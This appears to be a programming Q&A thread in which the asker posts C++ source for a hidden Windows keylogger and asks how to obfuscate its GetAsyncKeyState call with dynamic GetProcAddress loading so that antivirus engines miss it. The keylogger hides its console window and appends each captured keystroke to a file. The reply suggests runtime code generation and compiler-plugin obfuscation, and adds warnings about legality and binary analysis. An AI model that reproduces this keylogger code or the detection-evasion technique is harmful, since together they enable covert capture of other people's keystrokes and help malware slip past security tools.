I'm working on making my own source code obfuscator and I noticed that a simple keylogger is detected by some antivirus engines if there is a function call like this in the source code. "GetASyncKeyState". Take an example of this source code which is a simple keylogger main function.
int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';
while (true) {
Sleep(10);
for (int KEY = 8; KEY <= 190; KEY++)
{
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}
I want to obfuscate the function call of "GetAsyncKeyState" name so that no AV can detect it as a keylogger. I'm confused in the implementation of function call using ordinals and GetProcAddress. Like I have tried in the below code.
typedef int(__cdecl *MYPROC)(LPWSTR);
int main(void)
{
HINSTANCE hinstLib;
MYPROC ProcAdd;
BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;
// Get a handle to the DLL module.
hinstLib = LoadLibrary(TEXT("user32.dll"));
// If the handle is valid, try to get the function address.
if (hinstLib != NULL)
{
ProcAdd = (MYPROC)GetProcAddress(hinstLib, "GetAsyncKeyState");
// If the function address is valid, call the function.
if (NULL != ProcAdd)
{
fRunTimeLinkSuccess = TRUE;
(ProcAdd)(L"Message sent to the DLL function\n Loaded Wao");
printf("Yahooo Function Called");
}
// Free the DLL module.
fFreeResult = FreeLibrary(hinstLib);
}
// If unable to call the DLL function, use an alternative.
if (!fRunTimeLinkSuccess)
printf("Message printed from executable\n Not Worked Soory");
getch();
return 0; }
This implementation is not understandable. Kindly explain this also.
I just needed the equivalent of "GetAsyncKeyState(Key)" so that my obfuscator will detect that function call and replace it with the equivalent call (Dynamically) so that I can bypass static analysis detection.
Some of them can be bought. And a practical approach is to improve some existing open source compiler (like GCC or Clang) to add obfuscation inside it. With GCC, you could write a GCC plugin for that (e.g. with the help of the Bismon static analyzer). Be aware of licensing issues (your GCC plugin may need to be open source; ask your lawyer).
A possible approach is metaprogramming (see also RefPerSys). You could write (using e.g. asmjit, or libgccjit) some C++ code which generates machine code at runtime.
Instead of calling
GetAsyncKeyStateyour code could :at initialization (or periodically from time to time) get the address of
GetAsyncKeyStateand put that in some variable (some function pointer)generate machine code which calls that
GetAsyncKeyStatein some new functionfoocall
fooPlease check with your lawyer that want you want to code is legal in your country. In France, writing malicious software is a criminal offense.
Be also aware of Rice's theorem.
This is a naive point of view. And even with obfuscation, an executable can technically be reverse-engineered, by binary analysis tools like BinSec.
BTW, writing a source code obfuscator may be more costly than paying a lawyer to write a good EULA.
An opposite approach is to make your code open source (of course, you need approval from your manager or client). See references in this draft report. Or read (and have your manager read) The Success of Open Source. There are many economical and technical reasons to make some source code opensource: this paper (co-authored by a Nobel prize winner, Jean Tirole) explains them. Read also about what is free software....
consult a lawyer
PS. For questions (in first half of 2021) related to the Bismon source static analyzer (which could evolve into a code ofuscator, if additional funding is provided) or to the BinSec binary static analyzer, contact me by email to
[email protected]NB. My personal opinion on your technical approach is that it is very naive, and won't protect your proprietary software against serious binary static analysis teams.